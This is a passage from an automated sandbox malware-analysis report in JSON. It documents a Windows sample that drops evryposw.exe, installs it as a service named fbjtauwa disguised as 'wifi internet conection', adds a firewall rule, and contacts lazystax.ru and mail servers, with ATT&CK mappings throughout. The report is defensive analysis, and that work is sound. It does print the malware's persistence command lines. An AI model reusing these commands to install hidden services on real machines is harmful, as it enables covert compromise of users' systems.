dwOpenMode: \"1073741827\"\n dwPipeMode: \"0\" - (UID: 00000000-00004740)", "origin": "API Call", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-67", "type": 9, "relevance": 10, "name": "Process launched with changed environment", "description": "Process \"cmd.exe\" (UID: 00000000-00002140) was launched with new environment variables: \"USERDNSDOMAIN=\"%OSUSER%-PC\"\"\n Process \"cmd.exe\" (UID: 00000000-00002140) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"\n Process \"evryposw.exe\" (UID: 00000000-00004152) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, Path, TEMP, USERPROFILE, TMP, NUMBER_OF_PROCESSORS\"\n Process \"evryposw.exe\" (UID: 00000000-00004152) was launched with missing environment variables: \"LOGONSERVER, USERDNSDOMAIN, HOMEPATH, HOMEDRIVE\"\n Process \"netsh.exe\" (UID: 00000000-00004612) was launched with new environment variables: \"LOGONSERVER=\"%HOSTNAME%\", HOMEPATH=\"\\Users\\%OSUSER%\", HOMEDRIVE=\"C:\"\"\n Process \"netsh.exe\" (UID: 00000000-00004612) was launched with modified environment variables: \"LOCALAPPDATA, USERDOMAIN, APPDATA, USERNAME, USERDNSDOMAIN, Path, TEMP, USERPROFILE, TMP\"\n Process \"svchost.exe\" (UID: 00000000-00004740) was launched with new environment variables: \"USERDNSDOMAIN=\"WORKGROUP\"\"\n Process \"svchost.exe\" (UID: 00000000-00004740) was launched with modified environment variables: \"NUMBER_OF_PROCESSORS\"", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-302", "type": 9, "relevance": 3, "name": "Tries to move files", "description": "Process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\evryposw.exe\" %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00003340)", "origin": "Monitored Target", "attck_id": "T1570", "attck_id_wiki": "https://attack.mitre.org/techniques/T1570"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-25", "type": 9, "relevance": 3, "name": "Spawns new processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00002140)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\evryposw.exe\" %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00003340)\n Spawned process \"sc.exe\" with commandline \"create fbjtauwa binPath= \"%WINDIR%\\\\system32\\\\fbjtauwa\\\\evryposw ...\" (UID: 00000000-00002920), Spawned process \"sc.exe\" with commandline \"description fbjtauwa \"wifi internet conection\"\" (UID: 00000000-00002876), Spawned process \"sc.exe\" with commandline \"start fbjtauwa\" (UID: 00000000-00004864), Spawned process \"evryposw.exe\" with commandline \"/d\"C:\\\\1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1 ...\" (UID: 00000000-00004152)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004612), Spawned process \"svchost.exe\" (UID: 00000000-00004740)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "target-103", "type": 9, "relevance": 3, "name": "Spawns new processes that are not known child processes", "description": "Spawned process \"cmd.exe\" with commandline \"/C mkdir %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00002140)\n Spawned process \"cmd.exe\" with commandline \"/C move /Y \"%TEMP%\\\\evryposw.exe\" %WINDIR%\\\\system32\\\\fbjtauwa\\\\\" (UID: 00000000-00003340)\n Spawned process \"sc.exe\" with commandline \"create fbjtauwa binPath= \"%WINDIR%\\\\system32\\\\fbjtauwa\\\\evryposw ...\" (UID: 00000000-00002920), Spawned process \"sc.exe\" with commandline \"description fbjtauwa \"wifi internet conection\"\" (UID: 00000000-00002876), Spawned process \"sc.exe\" with commandline \"start fbjtauwa\" (UID: 00000000-00004864), Spawned process \"evryposw.exe\" with commandline \"/d\"C:\\\\1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1 ...\" (UID: 00000000-00004152)\n Spawned process \"netsh.exe\" with commandline \"advfirewall firewall add rule name=\"Host-process for services of ...\" (UID: 00000000-00004612), Spawned process \"svchost.exe\" (UID: 00000000-00004740)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-1", "type": 7, "relevance": 1, "name": "Contacts server", "description": "\"<IPv4>:25\"\n \"<IPv4>:443\"\n \"<IPv4>:443\"", "origin": "Network Traffic", "attck_id": "T1071", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-157", "name": "Matched Compiler/Packer signature (DIE)", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" was detected as \"Microsoft Linker\" and name: \"Linker\"\n \"evryposw.exe\" was detected as \"EP:Microsoft Visual C/C++\" and name: \"Compiler\"\n \"evryposw.exe\" was detected as \"Microsoft Visual C/C++\" and name: \"Compiler\"\n \"evryposw.exe\" was detected as \"Microsoft Linker\" and name: \"Linker\"", "origin": "Static Parser", "attck_id": "T1027", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027"}, {"threat_level_human": "informative", "category": "General", "identifier": "network-51", "type": 7, "relevance": 1, "name": "Queries DNS server", "description": "\"lazystax.ru\"\n \"microsoft-com.mail.protection.outlook.com\"", "origin": "Network Traffic", "attck_id": "T1071.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1071/004"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" has an executable section named \".text\"\n \"evryposw.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" has an writable section named \".data\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" has an writable section named \".text\"\n \"evryposw.exe\" has an writable section named \".data\"\n \"evryposw.exe\" has an writable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-125", "relevance": 3, "name": "PE file has a big raw size section", "description": "Raw size of \".reloc\" is \"0xc45000\" greater than 0x100000\n Raw size of \".reloc\" is \"0xde5000\" greater than 0x100000", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-146", "name": "PE file contains Debug data directory", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"\n \"evryposw.exe\" has Debug data directory \"IMAGE_DIRECTORY_ENTRY_DEBUG\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "static-18", "relevance": 10, "name": "Matched Compiler/Packer signature", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08\" was detected as \"VC8 -> Microsoft Corporation\"\n \"evryposw.exe\" was detected as \"VC8 -> Microsoft Corporation\"", "origin": "Static Parser", "attck_id": "T1027.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1027/002"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "registry-26", "type": 3, "relevance": 2, "name": "Reads the windows installation language", "description": "\"cmd.exe\" (Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\NLS\\LANGUAGE GROUPS\"; Key: \"1\")", "origin": "Registry Access", "attck_id": "T1614.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1614/001"}, {"threat_level_human": "informative", "category": "Unusual Characteristics", "identifier": "binary-33", "type": 8, "relevance": 3, "name": "Drops executable files inside temp directory", "description": "\"evryposw.exe\" has type \"PE32 executable (GUI) Intel 80386 for MS Windows\"- Location: [%TEMP%\\evryposw.exe]- [targetUID: 00000000-00003340]", "origin": "Binary File", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-126", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (executable)", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\FLTLIB.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\dbghelp.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\msvcr100.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\CRYPTBASE.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\PROPSYS.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\apphelp.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\version.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\ntmarta.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\Secur32.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\SSPICLI.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\Windows\\System32\\API-MS-WIN-CORE-FIBERS-L1-1-1.DLL\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-264", "type": 6, "relevance": 3, "name": "Creates a thread in a self process", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"sc.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"evryposw.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"netsh.exe\" creates a thread in process \"-1\" (Handle: 4294967295)\n \"svchost.exe\" creates a thread in process \"-1\" (Handle: 4294967295)", "origin": "API Call", "attck_id": "T1055.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055/003"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-243", "type": 6, "relevance": 1, "name": "Reads files", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" reads file \"c:\\1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" reads file \"c:\\users\\%osuser%\\desktop\\desktop.ini\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-177", "type": 3, "relevance": 1, "name": "Opens registry keys", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\\MACHINELANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\POLICIES\\MICROSOFT\\MUI\\SETTINGS\"; Key: \"\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\POLICIES\\MICROSOFT\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\LANGUAGECONFIGURATION\"; Key: \"\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\POLICIES\\EXPLORER\"; Key: \"\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"OPEN\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\\ASSEMBLYSTORAGEROOTS\"; Key: \"\"; Value: \"\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-263", "type": 6, "relevance": 1, "name": "Touches files", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\Windows\\SYSTEM32\\sechost.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-synch-l1-2-0.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-fibers-l1-1-1.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\Windows\\system32\\api-ms-win-core-localization-l1-2-1.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\Windows\\Temp\\VxSSL32.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\FLTLIB.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\Windows\\system32\\FLTLIB.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\Windows\\Temp\\VxOle32.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\Windows\\system32\\IMM32.DLL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"\\FileSystem\\Filters\\FltMgrMsg\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\dbghelp.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\Windows\\system32\\dbghelp.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\msvcr100.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\Windows\\system32\\msvcr100.dll\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"pipe\\uqyipjlp\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to touch file \"C:\\\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-16", "type": 6, "relevance": 1, "name": "Connects to LPC ports", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" connecting to \"\\ThemeApiPort\"\n \"netsh.exe\" connecting to \"\\ThemeApiPort\"", "origin": "API Call", "attck_id": "T1559", "attck_id_wiki": "https://attack.mitre.org/techniques/T1559"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-12", "type": 6, "relevance": 4, "name": "Monitors specific registry key for changes", "description": "\"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\Control\\NetworkProvider\\HwOrder\" (Filter: 4; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)\n \"netsh.exe\" monitors \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\PeerDist\" (Filter: 5; Subtree: 1)\n \"svchost.exe\" monitors \"\\REGISTRY\\USER\\.DEFAULT\\Control Panel\\International\" (Filter: 4; Subtree: 1)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\Protocol_Catalog9\" (Filter: 1; Subtree: 0)\n \"svchost.exe\" monitors \"HKLM\\SYSTEM\\ControlSet001\\services\\WinSock2\\Parameters\\NameSpace_Catalog5\" (Filter: 1; Subtree: 0)", "origin": "API Call", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-161", "type": 6, "relevance": 3, "name": "Tries to access non-existent files (non-executable)", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"pipe\\uqyipjlp\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe.Local\\\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:Zone.Identifier\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:Zone.Identifier\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\Windows\\System32\\netsh.exe:Zone.Identifier\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\1391626E285E40EA8A552EF63D340447762775A092237398135F91EB1FFE8F08.EXE.LOCAL\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\Windows\\System32\\cmd.exe:ZONE.IDENTIFIER\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" trying to access non-existent file \"C:\\Windows\\System32\\sc.exe:ZONE.IDENTIFIER\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-242", "type": 6, "relevance": 1, "name": "Writes files", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" writes file \"c:\\users\\%osuser%\\appdata\\local\\temp\\evryposw.exe\"", "origin": "API Call"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "api-55", "type": 6, "relevance": 7, "name": "Touches files in the Windows directory", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\Caches\"\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" touched file \"%LOCALAPPDATA%\\Microsoft\\Windows\\Caches\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\system32\\config\\systemprofile\\Local Settings:.repos\"\n \"svchost.exe\" touched file \"C:\\Windows\\TEMP\\wincookie.repos\"", "origin": "API Call", "attck_id": "T1083", "attck_id_wiki": "https://attack.mitre.org/techniques/T1083"}, {"threat_level_human": "informative", "category": "Installation/Persistence", "identifier": "registry-172", "type": 3, "relevance": 1, "name": "Queries registry keys", "description": "\"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\"; Key: \"PREFERREDUILANGUAGES\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKCU\\CONTROL PANEL\\DESKTOP\\MUICACHED\"; Key: \"MACHINEPREFERREDUILANGUAGES\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\SIDEBYSIDE\"; Key: \"PREFEREXTERNALMANIFEST\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SYSTEM\\CONTROLSET001\\CONTROL\\SESSION MANAGER\"; Key: \"SAFEDLLSEARCHMODE\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{11016101-E366-4D22-BC06-4ADA335C892B}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\EXPLORER\\DESKTOP\\NAMESPACE\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\"; Key: \"SUPPRESSIONPOLICY\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"ATTRIBUTES\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"CALLFORATTRIBUTES\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"RESTRICTEDATTRIBUTES\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"WANTSFORDISPLAY\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"HIDEFOLDERVERBS\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"USEDROPHANDLER\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"WANTSFORPARSING\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"WANTSPARSEDISPLAYNAME\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"QUERYFOROVERLAY\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"MAPNETDRIVEVERBS\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"QUERYFORINFOTIP\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: \"HKLM\\SOFTWARE\\CLASSES\\CLSID\\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\\SHELLFOLDER\"; Key: \"HIDEINWEBVIEW\"; Value: \"\")\n \"1391626e285e40ea8a552ef63d340447762775a092237398135f91eb1ffe8f08.exe\" (Access type: \"QUERYVAL\"; Path: 